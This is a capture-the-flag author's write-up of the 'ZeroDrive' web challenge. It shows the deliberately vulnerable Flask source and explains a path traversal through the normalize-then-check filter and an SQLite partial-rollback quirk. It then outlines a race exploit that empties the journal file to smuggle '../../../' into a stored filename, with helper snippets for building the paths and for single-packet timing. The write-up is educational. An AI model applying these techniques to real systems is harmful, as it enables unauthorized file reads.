ToH CTF 2025 - SQLite weirdness
For the ToH CTF 2025, I originally wanted to create an easy web challenge. During that process, I stumbled upon an interesting behavior in SQLite, which inspired me to turn it into a much harder challenge instead.
ZeroDrive
The challenge presents itself as a service that allows uploading 0-byte files and subsequently downloading them. The flag is located in the root of the filesystem.
The application only has four endpoints:
- `/`: lists all uploaded files
- `/upload`: allows uploading 0-byte files, but only within the `uploads` folder
- `/uploads/<uuid>`: allows downloading the uploaded file
- `/rename/<uuid>`: allows renaming the file
Challenge source
You can download the whole challenge deliverable (and exploits) from here
```python
import os
import sqlite3
import uuid
import shutil
from flask import Flask, render_template, request, redirect, url_for, send_file

app = Flask(__name__)
app.config['UPLOAD_FOLDER'] = 'uploads'
app.config['DATABASE'] = 'database.sqlite'

def get_db_connection():
    conn = sqlite3.connect(app.config['DATABASE'])
    conn.row_factory = sqlite3.Row
    return conn

@app.route('/')
def index():
    with get_db_connection() as conn:
        files = conn.execute('SELECT * FROM files').fetchall()
    return render_template('index.html', files=files)

@app.route('/upload', methods=['GET', 'POST'])
def upload_file():
    if request.method == 'POST':
        if 'file' not in request.files:
            return redirect(request.url)
        file = request.files['file']
        if len(file.read()) > 0:
            return 'File size exceeds 0 bytes', 400
        uuid_file = str(uuid.uuid4())
        save_path = os.path.normpath(os.path.join(app.config['UPLOAD_FOLDER'], file.filename))
        if "../" in save_path or save_path.startswith("/"):
            return 'Invalid filename', 400
        file.save(save_path)
        with get_db_connection() as conn:
            conn.execute('INSERT INTO files (filename, uuid) VALUES (?, ?)', (file.filename, uuid_file))
            conn.commit()
        return redirect('uploads/' + uuid_file)
    return render_template('upload.html')

@app.route('/uploads/<uuid_file>')
def view_file(uuid_file):
    with get_db_connection() as conn:
        file = conn.execute('SELECT * FROM files WHERE uuid = ?', (uuid_file,)).fetchone()
    if file:
        path = os.path.normpath(os.path.join(app.config['UPLOAD_FOLDER'], file['filename']))
        return send_file(path)
    return 'File not found', 404

@app.route('/rename/<uuid_file>', methods=['POST'])
def move_file(uuid_file):
    new_filename = request.json.get('new_filename')
    with get_db_connection() as conn:
        try:
            conn.execute("BEGIN TRANSACTION")
            file = conn.execute('SELECT * FROM files WHERE uuid = ?', (uuid_file,)).fetchone()
            conn.execute('UPDATE files SET filename = ? WHERE uuid = ?', (new_filename, uuid_file))
            old_path = os.path.normpath(os.path.join(app.config['UPLOAD_FOLDER'], file['filename']))
            new_path = os.path.normpath(os.path.join(app.config['UPLOAD_FOLDER'], new_filename))
            if "../" in new_path or new_path.startswith("/"):
                return 'Invalid filename', 400
            shutil.move(old_path, new_path)
            conn.commit()
        except Exception as e:
            conn.rollback()
            return f'Operation failed {e}', 400
    return redirect(url_for('index'))

if __name__ == '__main__':
    app.run(debug=False, host="0.0.0.0")
```
A trivial initial vulnerability is that a single `../` path traversal is allowed: `os.path.normpath` collapses it before the check runs, so the filter never sees it. This makes it possible to upload files to the main folder of the challenge, and potentially to overwrite the database file itself with a 0-byte file (which would just break the challenge).
The only other writable file in that folder is the rollback journal file, created and removed whenever an explicit transaction is performed.
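The ordering of normalization and check can be verified in isolation. In the sketch below, `is_allowed` is a hypothetical mirror of the challenge's filter, not part of the challenge code:

```python
import os

def is_allowed(filename: str) -> bool:
    """Mirror of the challenge's filter: normalize first, then check."""
    save_path = os.path.normpath(os.path.join('uploads', filename))
    return "../" not in save_path and not save_path.startswith("/")

# One level of traversal is collapsed away before the check runs...
print(os.path.normpath(os.path.join('uploads', '../database.sqlite')))  # database.sqlite
print(is_allowed('../database.sqlite'))  # True: the file lands next to the app
# ...but a second level survives normalization and is caught.
print(is_allowed('../../etc/passwd'))    # False
```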
SQLite WTF
When you start a transaction in SQLite, you expect the database to be able to fully roll it back on request. At some point, I wondered: how much RAM can SQLite use to handle such operations? The answer is just 10 MB.
If the data involved in the transaction exceeds this threshold (for example, when replacing a string larger than 10 MB), SQLite uses a temporary on-disk file (the journal file) to perform a rollback in case of error.
This is where a curious behavior comes into play: if the journal file is emptied during a transaction, you would expect SQLite to be unable to roll back at all. That is mostly true, except when the modification rewrites data fields with values of exactly the same size as those already in the database.
In that case, for example a query that replaces a string with another of equal length, if the transaction is rolled back after the journal file has been emptied, the rollback is only partial. This can leave the database in an inconsistent state with no obvious failure signal.
The root cause is that SQLite trusts the journal file: rolling back means replaying the original page contents stored in it. If the file has been emptied, SQLite finds no saved pages to replay, so the changes to those pages silently survive the rollback.
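The on-disk spill is easy to reproduce outside the challenge. The following sketch is my own (the tiny `PRAGMA cache_size` is there only to force the spill with a small row); it shows the rollback data sitting in the `-journal` file while the transaction is still open:

```python
import os
import sqlite3

DB = "spill-demo.sqlite"
if os.path.exists(DB):
    os.remove(DB)

conn = sqlite3.connect(DB, isolation_level=None)  # manage transactions manually
conn.execute("PRAGMA journal_mode=DELETE")        # classic rollback journal
conn.execute("PRAGMA cache_size=50")              # tiny page cache to force a spill
conn.execute("CREATE TABLE t (v TEXT)")
conn.execute("INSERT INTO t VALUES (?)", ("A" * 5_000_000,))

# Rewrite the large row inside an explicit transaction: the original
# pages no longer fit in the cache, so they spill to DB + "-journal".
conn.execute("BEGIN")
conn.execute("UPDATE t SET v = ?", ("B" * 5_000_000,))
journal_on_disk = os.path.exists(DB + "-journal")
conn.rollback()
conn.close()
os.remove(DB)

print(journal_on_disk)  # True: the rollback data was on disk mid-transaction
```

Emptying that file at exactly this moment is what the challenge is about.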
Challenge
In my application, when a path of about 50 MB is passed to the database, I observed that the journal file remains on disk for about 0.4 seconds (because Python's `os.path.normpath` is slow on a 50 MB string). This short interval is the only useful window in which to manipulate it.
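The timing claim is easy to sanity-check; the sketch below builds a ~50 MB path out of self-cancelling `x/../` segments (my construction, not from the challenge; the exact duration depends on hardware):

```python
import os
import time

# Build a ~50 MB path whose "x/../" segments cancel out under normpath.
big = "x/../" * 10_000_000 + "flag.txt"

t0 = time.perf_counter()
normalized = os.path.normpath(os.path.join("uploads", big))
elapsed = time.perf_counter() - t0

print(normalized)         # uploads/flag.txt
print(f"{elapsed:.3f}s")  # typically a few hundred milliseconds
```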
If I go ahead and actually empty this file during the transaction, and the transaction is then rolled back, the string left in the DB is partly the original value and partly the new one, as if the reverted update had half-succeeded.
The resulting string in the DB looks like `ABBBBBA`, where A is part of the original string and B is part of the new string that should have been rolled back.
To summarize, the steps are:
- Upload a file
- Rename that file using a long 50 MB path `samepath` that, once normalized, points to `flag.txt`
- Rename the file again using another 50 MB path that is identical to the previous one but with some `../../../` in the middle, i.e. a string like `samepath[0:25MB] + '../../../' + samepath[25MB+9B:]`
- Exploit the race condition by uploading a 0-byte file at the path `../database.sqlite-journal` (the path of the journal file) concurrently with the step above
- Open the file that now points to `../../../flag.txt`
- Win
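The two 50 MB paths from the steps above can be built as follows. This is a sketch: the `x/../` segment and the splice offset are my choices, and only the length and normalization properties matter:

```python
import os

UNIT = "x/../"           # each segment cancels itself under normpath
SIZE = 50 * 1024 * 1024  # illustrative target size, ~50 MB

# First rename: a huge path that normalizes to a plain flag.txt inside uploads.
samepath = UNIT * (SIZE // len(UNIT)) + "flag.txt"
assert os.path.normpath(os.path.join("uploads", samepath)) == os.path.join("uploads", "flag.txt")

# Second rename: same string, but with '../../../' spliced over 9 bytes in
# the middle, aligned to a segment boundary so the rest stays a valid path.
mid = (len(samepath) // 2 // len(UNIT)) * len(UNIT)
evil = samepath[:mid] + "../../../" + samepath[mid + 9:]
assert len(evil) == len(samepath)  # equal length: the key to the partial rollback
```

Because the two strings have exactly the same length, the partial rollback mixes them in place, and the surviving `../../../` makes the stored filename normalize to a path outside `uploads`.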
Remote
The biggest challenge in exploiting this remotely lies in synchronizing the two requests precisely enough. To send a large request with accurate timing, a single packet attack is used: everything except the end of each request is transmitted in advance, so the race only has to be timed on the final packet, reducing the variance to network jitter alone.
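A minimal sketch of the staging idea follows. The helper names are hypothetical, it speaks raw HTTP over a plain socket, and it captures only the "hold back the final byte" part, not the TCP/HTTP/2 details of a full single packet attack:

```python
import socket
import threading

def split_payload(raw: bytes):
    """Everything except the last byte can be pre-sent; the final
    byte is what lets the server act on the request."""
    return raw[:-1], raw[-1:]

def send_staged(host: str, port: int, raw: bytes, barrier: threading.Barrier):
    # Pre-send the bulk of the (possibly 50 MB) request, then wait so
    # that all racing requests release their final byte together.
    head, tail = split_payload(raw)
    with socket.create_connection((host, port)) as s:
        s.sendall(head)
        barrier.wait()
        s.sendall(tail)
```

One thread per request, all parked on the same `Barrier`, means only the final one-byte sends need to race, which is what shrinks the timing variance down to network jitter.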